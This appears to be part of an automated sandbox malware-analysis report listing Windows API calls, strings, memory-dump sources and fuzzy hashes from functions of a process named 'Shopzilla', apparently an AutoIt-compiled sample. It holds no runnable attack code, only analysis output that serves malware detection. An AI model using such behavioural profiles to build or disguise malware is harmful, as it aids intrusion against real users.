                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C05866
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: dc197de5b69340131a1cea63df43288358442493082f31491df858cb1ae49943
                                              • Instruction ID: 2a036df07b8bfae79921ed053304b5c8e725851ec9fb2ca1ca6fe1a5644cf7b4
                                              • Opcode Fuzzy Hash: dc197de5b69340131a1cea63df43288358442493082f31491df858cb1ae49943
                                              • Instruction Fuzzy Hash: 46F01D32251558BBE7215B929C0EFEF7A7CEBC6B11F100159FA0491090D7A01A1186B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 00C0766B
                                              • EnterCriticalSection.KERNEL32(?,?,00BAC2B6,?,?), ref: 00C0767C
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00BAC2B6,?,?), ref: 00C07689
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BAC2B6,?,?), ref: 00C07696
                                                • Part of subcall function 00C0705D: CloseHandle.KERNEL32(00000000,?,00C076A3,?,00BAC2B6,?,?), ref: 00C07067
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C076A9
                                              • LeaveCriticalSection.KERNEL32(?,?,00BAC2B6,?,?), ref: 00C076B0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 9a6c0ab5223c9338c4df89dcee846bcaab2272e6ed47609448cba8306992b778
                                              • Instruction ID: 41321f9ee110dd204db055fc52bff84498378895171081a8e59a65d39ec59056
                                              • Opcode Fuzzy Hash: 9a6c0ab5223c9338c4df89dcee846bcaab2272e6ed47609448cba8306992b778
                                              • Instruction Fuzzy Hash: 13F05833565611ABD7152B68EC9CBAF7739FF4A702F240522F603A10A1CBB66901CB60
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BF9338
                                              • UnloadUserProfile.USERENV(?,?), ref: 00BF9344
                                              • CloseHandle.KERNEL32(?), ref: 00BF934D
                                              • CloseHandle.KERNEL32(?), ref: 00BF9355
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BF935E
                                              • HeapFree.KERNEL32(00000000), ref: 00BF9365
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: f522280c08921aa0cbb3da6256c166d2e6f3c51a5def5c8b0ba6cb966f475e09
                                              • Instruction ID: fc3326866d30692a2832634a46155f27df2b6e10ea593963c201d7bf8b405755
                                              • Opcode Fuzzy Hash: f522280c08921aa0cbb3da6256c166d2e6f3c51a5def5c8b0ba6cb966f475e09
                                              • Instruction Fuzzy Hash: F3E0E537014105BBDB411FE2EC1CB5EBF39FF49B22B204220F21581470CB32A460DB50
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00C18AC5
                                              • CharUpperBuffW.USER32(?,?), ref: 00C18BD4
                                              • VariantClear.OLEAUT32(?), ref: 00C18D4C
                                                • Part of subcall function 00C0798A: VariantInit.OLEAUT32(00000000), ref: 00C079CA
                                                • Part of subcall function 00C0798A: VariantCopy.OLEAUT32(00000000,?), ref: 00C079D3
                                                • Part of subcall function 00C0798A: VariantClear.OLEAUT32(00000000), ref: 00C079DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: f270144d5bfc2c2e9085583902d4498f6053be1f4b087ea3eb54711f66b84a11
                                              • Instruction ID: bd99e47dec86a94665e56c421d61811eaa0f0e421581101cba4403e4429c4151
                                              • Opcode Fuzzy Hash: f270144d5bfc2c2e9085583902d4498f6053be1f4b087ea3eb54711f66b84a11
                                              • Instruction Fuzzy Hash: 8E9191716083019FC700DF24C4919ABBBF4EF8A754F14896DF8998B361DB31E989DB92
                                              APIs
                                                • Part of subcall function 00BB436A: _wcscpy.LIBCMT ref: 00BB438D
                                              • _memset.LIBCMT ref: 00C0319B
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C031CA
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C0327D
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C032AB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: d02a53466d0817f8287bdfcadff45ae88565fa7678fb428aaf69beb29130d2cd
                                              • Instruction ID: f934e1ea6c2337b45a3dfe17cc313c7ab921c20615ff008b109bdaea5f421aa2
                                              • Opcode Fuzzy Hash: d02a53466d0817f8287bdfcadff45ae88565fa7678fb428aaf69beb29130d2cd
                                              • Instruction Fuzzy Hash: 8851AF716083819BDB25EB28D845B6BB7ECAF49750F040A2DF8A5971D2DB70CB44CB92
                                              APIs
                                              • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C187D6,?,00000000), ref: 00C2DCCE
                                              • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00C187D6,?,00000000,00000000), ref: 00C2DD04
                                              • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 00C2DD15
                                              • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C187D6,?,00000000,00000000), ref: 00C2DD97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 42ef443b04df6f28690f98620c1c73ad67d5f91ef6141479712d2005a61f0cdc
                                              • Instruction ID: b109d578b96012a83e29ba0ba1bb4ddec6ce79b2d53030fc42d83f37822e53c5
                                              • Opcode Fuzzy Hash: 42ef443b04df6f28690f98620c1c73ad67d5f91ef6141479712d2005a61f0cdc
                                              • Instruction Fuzzy Hash: 4841BDB6600615EFCB15DF64E888B9ABBB9EF55310F1080A9EC069F245D7B1DA40CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00C02DD3
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C02DEF
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00C02E35
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C66890,00000000), ref: 00C02E7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 742dbd6defa129d7ae778f65eca49f926accecffe20d9703b3214f5e073a4768
                                              • Instruction ID: c2417eea37fb6264acc98ce879f561bfc655acafaa938eb50e97461d936e6c33
                                              • Opcode Fuzzy Hash: 742dbd6defa129d7ae778f65eca49f926accecffe20d9703b3214f5e073a4768
                                              • Instruction Fuzzy Hash: 4541AE312443419FDB24DF24C898B6AB7E8AF89311F10462DF8B5972D1D770EA05CB62
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C1DC76
                                                • Part of subcall function 00BB1462: _memmove.LIBCMT ref: 00BB14B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 1336ce78cb512c6b8608623055fc4490da738d4d80db1de198618707abac727b
                                              • Instruction ID: 87c6b2452ce78105746a5fae5c40a002469ff6142e4488ce9c358726313705d7
                                              • Opcode Fuzzy Hash: 1336ce78cb512c6b8608623055fc4490da738d4d80db1de198618707abac727b
                                              • Instruction Fuzzy Hash: F531CF70910219ABCF00EF58C8519FEB3F8FF16314B508A69E836A72D1DB71EA45CB90
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BF98AF
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BF98C2
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BF98F2
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: e4a75d8fb1b3333d42061807f439c236fc82a13d49c7c3ef179f49e2bbd0bc0e
                                              • Instruction ID: 877ecf1f01df89ef4074dd81946c33c44b04ba812fc5034a2ce3a41680912c79
                                              • Opcode Fuzzy Hash: e4a75d8fb1b3333d42061807f439c236fc82a13d49c7c3ef179f49e2bbd0bc0e
                                              • Instruction Fuzzy Hash: 3B210472A0010CAFDB14ABA4CC66EFFB7F8EF41350B504299F921A71E1DB7409498660
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C11CFC
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C11D22
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C11D52
                                              • InternetCloseHandle.WININET(00000000), ref: 00C11D99
                                                • Part of subcall function 00C12933: GetLastError.KERNEL32(?,?,00C11CC7,00000000,00000000,00000001), ref: 00C12948
                                                • Part of subcall function 00C12933: SetEvent.KERNEL32(?,?,00C11CC7,00000000,00000000,00000001), ref: 00C1295D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: 4c457623a59ba00791a41d0f547a0ecabf742ab29342b3b132c7b6609c2f5c23
                                              • Instruction ID: 1a1ee530e90d1b237095b3f252bc424ec12b0f62e521eab9a6897d1d7c2fc8b6
                                              • Opcode Fuzzy Hash: 4c457623a59ba00791a41d0f547a0ecabf742ab29342b3b132c7b6609c2f5c23
                                              • Instruction Fuzzy Hash: 3421C272500208BFE712AF64DC85FFF76FCEB4A744F14411AFA05A2240DB289E55ABA1
                                              APIs
                                                • Part of subcall function 00BA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BA214F
                                                • Part of subcall function 00BA2111: GetStockObject.GDI32(00000011), ref: 00BA2163
                                                • Part of subcall function 00BA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA216D
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C2684E
                                              • LoadLibraryW.KERNEL32(?), ref: 00C26855
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C2686A
                                              • DestroyWindow.USER32(?), ref: 00C26872
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 49f37aed800d5b438dc9c2dbaff008df0421f1ff3c52558a38be2a980ede3757
                                              • Instruction ID: 4add74593c7414a5f961b7c93d580fb50f8401aa72ace804d6eccd097fd6c476
                                              • Opcode Fuzzy Hash: 49f37aed800d5b438dc9c2dbaff008df0421f1ff3c52558a38be2a980ede3757
                                              • Instruction Fuzzy Hash: C421BB72600219ABEF104F64EC90FBB77ADEB59328F204628FA60925D0D731CC519770
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00C071E4
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C07217
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00C07229
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C07263
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: f9c4db09c1c616ac4e82414edba2c415eba3cc748d53a1ceb32fd0d22cf82065
                                              • Instruction ID: 8987e6537d26328266c9e293684d249462ee7dbcb1d3cc878a82e009038fa7e5
                                              • Opcode Fuzzy Hash: f9c4db09c1c616ac4e82414edba2c415eba3cc748d53a1ceb32fd0d22cf82065
                                              • Instruction Fuzzy Hash: AF219071A08206EBDB249F29DC04B9E7BA4AF45720F204B19FCB4D72D0DB70A950CB50
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00C072B1
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C072E3
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00C072F4
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C0732E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 41bed5874037569792fa24a42ae9064420cbba11db75e552e70f727f5efa4a8e
                                              • Instruction ID: ad2be8a692651e839c0daab82fcc215f8dc9e23f93de4d928d4843e8111f1c52
                                              • Opcode Fuzzy Hash: 41bed5874037569792fa24a42ae9064420cbba11db75e552e70f727f5efa4a8e
                                              • Instruction Fuzzy Hash: A7219071A08205DBDB249F698C05B9A77A8AF55730F300B19FCB0E32D0DB70A950CB51
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00C0B104
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C0B158
                                              • __swprintf.LIBCMT ref: 00C0B171
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C30980), ref: 00C0B1AF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: f79f0530e889c57bea4bf031bc43ad494f15a9758a770440866668ad7229b3ad
                                              • Instruction ID: 4c827f5cd7e943cda4a261fa5c952899567a0b9852264062ed9200e55064719c
                                              • Opcode Fuzzy Hash: f79f0530e889c57bea4bf031bc43ad494f15a9758a770440866668ad7229b3ad
                                              • Instruction Fuzzy Hash: 29217175A00108AFCB10DF64C995EAEB7F8FF89704B1080A9F909D7252DB72EE45CB61
                                              APIs
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                                • Part of subcall function 00BFA835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BFA852
                                                • Part of subcall function 00BFA835: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFA865
                                                • Part of subcall function 00BFA835: GetCurrentThreadId.KERNEL32 ref: 00BFA86C
                                                • Part of subcall function 00BFA835: AttachThreadInput.USER32(00000000), ref: 00BFA873
                                              • GetFocus.USER32 ref: 00BFAA0D
                                                • Part of subcall function 00BFA87E: GetParent.USER32(?), ref: 00BFA88C
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BFAA56
                                              • EnumChildWindows.USER32(?,00BFAACE), ref: 00BFAA7E
                                              • __swprintf.LIBCMT ref: 00BFAA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: 7569f159aa1981f7bece034bd4e3cba1ef216e89e963b416f8bcc64765e30044
                                              • Instruction ID: c3a23a7c4c1ea4da26eb3dbc7c56d0f47d4326e502b1c5dc6f70d14b0fc06783
                                              • Opcode Fuzzy Hash: 7569f159aa1981f7bece034bd4e3cba1ef216e89e963b416f8bcc64765e30044
                                              • Instruction Fuzzy Hash: 111163B1500309ABDF15BFA48D96FFA37BCAB44700F1040A9BE0CAB152DA705959CB71
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00C02184
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
